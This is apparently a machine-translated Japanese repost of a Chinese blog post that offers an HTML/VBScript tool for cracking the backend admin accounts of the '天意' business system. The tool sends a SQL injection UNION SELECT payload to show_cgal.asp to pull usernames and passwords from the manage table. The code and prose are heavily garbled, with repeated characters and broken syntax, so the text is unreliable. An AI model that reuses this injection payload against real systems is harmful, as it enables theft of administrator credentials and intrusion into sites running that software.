天意ビジネスシステムのバックグラウンド管理アカウントが解読されました。

2999 ワード

//＊慈勤強http://blog.csdn.net/cqq */前回天意ビジネスシステムの解析プログラムを書いてから、多くの友達から手紙をもらいました。手順の原理を聞きました。どのように保護するかを聞きました。今日はちょっと時間を割いて、このHtml版を作りました。このhttmファイルだけが信じられます。知識とSQL Injectionの知識の友達は原理が分かりやすくて、ユーザーのアカウントを解読するのはSQLを使います。 Injectionの方法は、このシステムの多くのところにsqlがあります。 injectionの穴を開けて、自分でこのシステムをダウンロードすれば、問題を見つけやすくなります。以前はVc++バージョンでしたが、今はhtmlのバージョンです。httpプロトコルでウェブページのソースファイルを取得してソースファイルを分析し、ユーザー名とパスワードを探して表示します。以下はソースコードです。このファイルをハードディスクに保存して、名前をty.httmと名付ければいいです。meta http-equiv="Conttent-Type"content="text/htmlcharset=gb 2312"/>天意ビジネスシステムのバックグラウンド管理アカウントが解読されました。版--慈勤強制作VbScript">Function bytes 2 BSTR（vIn）streturn="“For i=1 To LenB（vInbit）Thise=Inder Code Corp=Inder Corc.（Thasp=Inder Coder Corc.）。H 80 The n streturn=streturn&Chr(ThisCharCode)Else Next CharCode=AcB(MidB(vIn，i+1,1)streturn=streturn&Chr(CLng)*&H 100+CInt(Next CharCode)i=i+1 End If Next bytes 2 BSTR=streturn End Function Sub OpenUrl(stral)struct="stration="straAAA="strCqq="i=0 on Error Resume Next While Trim"""""""""="/wlyx/show_cgal.asp？newsid==1%20 and%201=2%20 union%20 select%201,username%2 b'*'%2 bpassword，3,4,5,6%20 from%20 manage%2020%20 select% 20%20 from%20%20%20%20 from%20 cgal%20 20%20 cgal% 20 20 20%20%20 cgal% 20 20 here%201=2"set xmlhtp=CreateObjec（" Microsoft.XMLHTTP"）xmlhtp.open，ststrerextttttdddddddddttttttttBBBtrtrtrtrtrtrtrtrtrtrtrtrtrtrtrtrtreeeeeeeeppppppppphtttttttttttttttttttttttttttttttttttttteBody)」""If Trim(>""The n arr=Split(straAAA)「＊＊＊」）struser=arr(0)straCqq=straCqq+vbNewLine+「ユーザー名：」+struser+vbNewLine+「パスワード:」+arr(1)+vbNewLine Else stration=「End If/msbox=Resmtxhtch」アドレス：「+stststststrurl+」/admin)「+vbCrLF+VVBCRLF+stCqq+vbnewline cqdmin.innenenettMid=str 1=ststriCqq Else cqdmin.inneTex=」エラー「End If EnnnSub FFFunctgetMid(str，str，str，str 1，str，str 1，str，str 1，str 2，str 2，str 2，str 2，str 2，str 2，str 2)==========str，str，str，str，str，str，str，str 1，str，str Len(str 1)j-i-Len(str 1)End If End If getMid=str 11 End Function</disable_script><style type="text/css" <！--body，td，th{font-size:9="" pt;}<="" style=""><table width="600"border="1"align="center"cell padding="2"cell lspacing="0"borderカラー="濞D 4 D 4"bgカラー="galt E 4 E 4 E 4"<tr><td width="39%ビジネスシステムの管理のバックグラウンド">Ce<a href="Http://blog.csdn.net/cqq「target=」_blank">Http://blog.csdn.net/cqq＜a＞＜td＞＜tr＞＜table＞＜table width=“600”border=“0”align=“centr”cell padding=“0”cell pacing=“0”＞＜tr＞＜td＞＜form name=“framCqq”method=“post”=＜forttdededededededededededededededededel＞＞＞＞＞＞＞＞＞＞“post=“post=＜dedededededededededededededededededededededededededededededededededededededededededededededededededededededededededededededededededede「0」celspacing=「0」<tr><td width=「20」></td><td><span id="cqadmin"/></td><table><table width="600"border="1"align="center"celpadding="1"celspacing="0"borderカラー="踞E 4"/Etract 4を参照してください。//テーブル><p>p><p></p><p></p>[Ctrl+A全注：<a href="https://www.jb51.net/article/23421.htm" title="查看具体详情" rel="noreferrer noopener nofollow">引入外部Js需再刷新一下页面才能执行</a>]</style><div class="container-fluid p-0"> <script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-3219747971601011" crossorigin="anonymous"></script>  <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3219747971601011" data-ad-slot="3872614099" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> </div> </div> <div class="row mb-4 pt-4 pb-4"><div class="col-6 text-primary "> <a class=" btn btn-outline-dark small float-left " href="/p/100425"> <svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-arrow-left"> <line x1="19" y1="12" x2="5" y2="12"></line> <polyline points="12 19 5 12 12 5"></polyline> </svg> 風信4.0未公開Bug</a> </div><div class="col-6 text-primary "> <a class=" btn btn-outline-dark small float-right " href="/p/100427">Vueはカートの基本機能を実現します。 <svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-arrow-right"> <line x1="5" y1="12" x2="19" y2="12"></line> <polyline points="12 5 19 12 12 19"></polyline> </svg> </a> </div></div> </article> </div>  </div>  </div>  </div>   <div class="col-12 col-xxl-3 col-xl-3 "> <div class="card sticky-top" style="top: 20px;"> <div class="row"> <aside class="col-md-12 col-xxl-12 d-none d-md-block pt-0"> <div class="sticky"> <div class="container-fluid p-0 m-0 bg-light-off "> <script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-3219747971601011" crossorigin="anonymous"></script>  <ins class="adsbygoogle" style="display:inline-block;width:300px;height:600px" data-ad-client="ca-pub-3219747971601011" data-ad-slot="1251860546"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> </div> </div> </aside> </div> <div class="card-body"> <div class="row "> <aside class="col-md-12 col-xxl-12 d-none d-md-block pt-3"> <div class="sticky">               </div> </aside> </div> </div>  </div>  </div>   </div> </div> <footer class="bg-light p-3 mt-5"> <div class="container"> <div class="row gutter-3"> <div class="col-12 col-md-12 text-white text-center text-lowercase"> <p class="mb-0 text-black-50 small text-lowercase">©2022 jpdebug.com. All Rights Reserved. | <a href="/privacy" target="_blank" class="text-dark" rel="nofollow">Privacy Policy</a> | <a href="/contact_us" target="_blank" class="text-dark" rel="nofollow">Contact US</a> | <a href="/sitemap.xml" target="_blank" class="text-dark" rel="nofollow">Sitemap</a></p> </div> </div> </div> </footer>   <div class="nk-cookie-banner alert alert-secondary text-center mb-0 small" role="alert" style="background: rgba(255, 255, 255, .6);border-color:#f2f2f2;-webkit-backdrop-filter: blur(10px);backdrop-filter: blur(20px);"> 🍪このウェブサイトは、あなたが我々のウェブサイトで最高の経験を得ることを確実とするために、クッキーを使います。 <a href="/privacy" target="blank" rel="nofollow">プライバシー条項の表示</a> <button type="button" class="btn btn-primary btn-sm ml-3 shadow-none" onclick="window.nk_hideCookieBanner()"> 同意します </button> </div> <script src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js"></script> <script src="http://cdnjs.cloudflare.com/ajax/libs/highlight.js/9.2.0/highlight.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.8/dist/clipboard.min.js"></script> <script src="/static/all_theme_package/quick-website.min.js"></script> <script src="/static/all_theme_package/cookie-banner.js"></script><script> var _hmt = _hmt || []; (function () { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?d95bbf01f0dd90da512ecedf1d9661bd"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); </script> <script async src="//static.getclicky.com/101379076.js"></script>      <script src="/static/all_theme_package/auto-enable-prism.js"></script> <script src="/static/all_theme_package/prism.min.js"></script></body> </html><script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="2f401f0cb611b3ac611a0da3-|49" defer></script>